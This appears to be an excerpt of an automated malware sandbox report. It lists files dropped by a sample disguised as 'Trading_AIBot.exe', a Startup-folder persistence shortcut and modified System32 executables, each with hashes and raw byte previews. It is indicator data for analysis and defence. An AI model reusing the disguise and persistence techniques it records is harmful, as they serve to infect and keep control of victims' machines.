                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.................................J...........................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5fu3jw1.yy2.ps1

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4p3xxpk.s0q.psm1

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbavhkd4.uqx.ps1

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfzeabvr.wso.psm1

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\6465d78f7f049fe9.bin

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.98220267790633
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:N8HCrgl+WOXqnJnb2FuTIZ8LsiCizVXQdA4dmTZGsRkOiume2XF+65pZ+60Ifeb:ii2OXq/IUDdxvYmTZNSUmnv00eb
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B228D350632CCC48F8985E2B4831DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1E8CCD439102B45EA52F54A1E975752C9CFEF677
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A81D3E00FF3DC7450DCF2CE888AD6BB508F45C6B51622680BCD664C860C0A006
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0588E1D37901031A4C3692A3FC826FB829CE2379AB9A504447EDEF73378A4A30B22AE93CBAD35D0C5E7AFDD907BF4DB5DAF87C091A8A4BC3523D49A1A3834030
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:^..t..wQ..m..:.7p...p7z]c1W.'G+.}.\..i.z:LJ..#u.U4#..7.<a..#.h!Z..].D=t.........._r.7r....zk._.....,.M..!.i..*.,+./.,.dY...:../......~_j:.<J......u........[E.].&..O......z..XXy...M,.U.^nr........c.c.#..B*..Z.\..W24(.f:.E.hu..@...8......>Q0....zK...Jj.'.$.i.K3....^...7`.X\tU....l..A.f.n.P.2#.0 ......W.......t..x..C....IY..Ej;@.n.@.?..$.N.l`?`...j1.f...u2.~.U....L...X."..0...."5@.g...GF-.`.."M...\C..E..../.y.1x.l.....p...e.X.]..vX.t1.=Ae`..=^..-.K..w....6..>....gT"]...J.y...{...k....:...R..s.k...6.v.@w.mT/.E.O>.}....$&.:..EG..B.n..R0=a......T..5.M..t.....sx...(&%X6Ro......|6...;..r...........]T...9B......vNJ7)2..Q%E..'.D{...R.!.....U%1,..rpW..l.....$.......SC.2)+b.s?w.[..~.]..n.C..>......zd g.....fH...&!..k.....vw....U'x}.b........j.G...bH5..+j.......>Qgu,...F.iO..0H.-.&.V.K{.z.Rt?.u.........5..e...8.5..6.#q.[<.6.....G.m..uC@.uG2? .6.H.Q9..Y...:>....aN....h..A..eM/..(.....$^R..7.e}.T...&.d..<o.$.(..v..4...i=.[....#..A..,u_._.\.mh...+

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999999373899194
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE8B7DECEB50DD1F1A36C5BC2B9B0250
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DDB384E52B08F4A1F32BAF2E006D8B12DC1320B2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CAC81AC319FF195EAB640679F3CA99E3F8F93228DC1B02703741F07A532E17A5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A78DDC165C80683A09B55153BA54A3ED660F53B877F6823735A06601809F941FE8F52F54694A772547CDE4DF293B8A9ED608AFCF152CFF19535B0C6296D4E2D2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1832
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.5529084750238744
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:8nsXMlykXG/tz0/CSL4WWeMNDyWlT9ZVJQ17+AUcZvclayJQ17+Ad/CNfBn/v4tK:8srxWLqeMNmG9LuR9ZvcLuRZ2Fdqy
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B265F584BC5BA0D9042584A3F6C455DB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:17CA0B09C70800E71C780D9271D7ECDEEA1142CE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7850E54DA9C9B5D59369B0FC2E1E1FDCDC19336302EBD7ADF571B58010B298
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB5D16E954A5427E0E0430895D461F8FEAF1FD7FD5EE630A5DCDF74FD671D45FCDD37903DBB86FE49423C26DB8C4D9EA77F32A35B2780D74EF55B0B82C0089CE
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@......................................................=....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.6.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%SystemDrive%\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe....................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.253733103660469
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FQW4qoNUgslKNX0Ip0MgHCpoMBOuBsqjnhMgeiCl7G0nehbGZpbD:FQW9BKNX0IPgiKMBOuVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7CB21DCAD3B21967F4E5DF9CF3F75EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CE1978724850F471C93A8FA32E3D15CEC08F27CB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:057CF201051EFB43E652A6648F4B2BBD250884871022A35A3C606C0D97E13B51
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1550C02872113A9E4A2983A8C156F48FFC6862889CA16F2C96308E0FDBE69BE55BDD57976A7423B9352891A40F802743B726EF4356F00F5EF0BD3C50FB025F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163545111098871
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:u2G7AbHjkOsqjnhMgeiCl7G0nehbGZpbD:u2G7AbHj3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E00165FE54F19D1DEEEEFC021D118FF2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A572D14C5481EF3EBDCDA1961972984D510206C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09828FEC239E18720A9DA2E777C586BA7D58915FDC3311696D3AC338E388770B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D62A9425547576ADB58173ACDF846F917F5723F3FE8B3A2CD52C8D1043310177A06A2057CAD44067EC7C9803B3C9E297643FAB6386679E7371DCD73BAEB3F385
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................H~.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.2889313283218
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hkdpSI+K3S/GWei+qNv2uG3GsqjnhMgeiCl7G0nehbGZpbD:h6SIGGWei2uG3KDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8C4572ABE5A5F57DFA8806CCF85CB414
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:979C0F0A473103B182A25269CCF7A19470A874D4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:497746349A513645094828FEDF0795F5BD9AB83D7F4BA88FB5E9A687DDC36EAC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:529DD0FC05A230E7EACB2EDB62D87AABF1BF54A5DDA61779E7C90A2A4CFF75CBA44309D6BCD10FC3434077F38BCD429108CF8D4301EC842633B86DCFBABCC505
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P....... .... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163298507277617
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:nEP3R6bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:s6bsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:39868E9AD4918B18A6AD00C9FF3BE84E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2AE518AB5B6822DBAA824F57E45DD87EEAF8034E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:904EB2819A94929059A78B511A0340039DADB8A923D5575A4A37CBDEBBC9D897
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ADCC90903D95F4E3C8DE5C7D994BDDE3F0B37E6D380A3AA10144435D27E47F1E4DD355CE145D7087DBAA3761075F1CA709848B8A6BFDB0655F98EBD4880CAFE6
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Roaming\6465d78f7f049fe9.bin

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.985444392774893
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:zIRSa9cFUraS92bXaoDuqxp80pxN2pfMgo3BsERsEVrIecSBkOYp+9MMTwVwJpz:8UEc3SUblHO012pfMgeGY6SeMM/C
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:82482AFB5673C89E3C7D3206647560FF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5B4191E5E3A10407FD69CF5EF35D6282D1091020
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:87EECAE2AC2E246E7E49BC6DBF0CCC18FC6CF91D333A448AC125F1B07297FBB0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2961A1F253837B4CC4B25B64ACBF2AB2496E18B113CA5459819A59AF14DA942A55A1E9202540032E12F19E3A4F6C4C37C3C5056571C4D74A96253F5550C5EC1D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:...`j..\U...M.........E.C.1..>h.....jq.0..C3.)X...~...,..;..[.......pn..2..5.=RITT.%~3MN....B.ze..H.6.A.21..#..]HC...h...:.I....|...c./...6bA..I........!.Z.K+...nx.FYr....!.:@.Qb......'.b..,3....X9..^AW ...R.O..Ia^*$.M.b.:..5E.N...k.-...b.@..T..2&9.A_.4........f.K|....pU&..|..............rQd^I.zQb'....w.......]=.Z.........+..'....&...5U.O.(v.PN.........]?.*.X~...I....g....H.N......H .....L.8Z9..U.....h\$n.D....x!.9..5n.f.0.).?\. .w8.z.Th...`......_S...`....?......._V..... ,..T....h\.....fx.L..U..n..P..!8.u]..)F&D..(LpO.....g._...yx. a..2.3..qg.Ec.L..v..E...T:)...C9tr.F.uQ:#.rG..j..R..F....0.....o......\j.3.i.+._...[.l.9.-g....-...G.xm\...4.........../I..J...}...R..:..:N....J1.pE. .L.........2>...q.r.S."l...&......].fX....o...[...2_..FN.........x..E...M9$.`.*]...)z..<2-n1.`..x....U..yq.4..W.[..$.%.......3@t.G=..>'X9K...3...N..I;"....#>Wd....aE)t.....NQ..#>.?D....9....Aw?H.6.M..:W-...EV..T....,.........L.[..Q..(c...B....I.....:.....tV.E.j:.N...m..=

                                                                                                                                                                                                                                                                                                                                                                                                                                    \Device\ConDrv
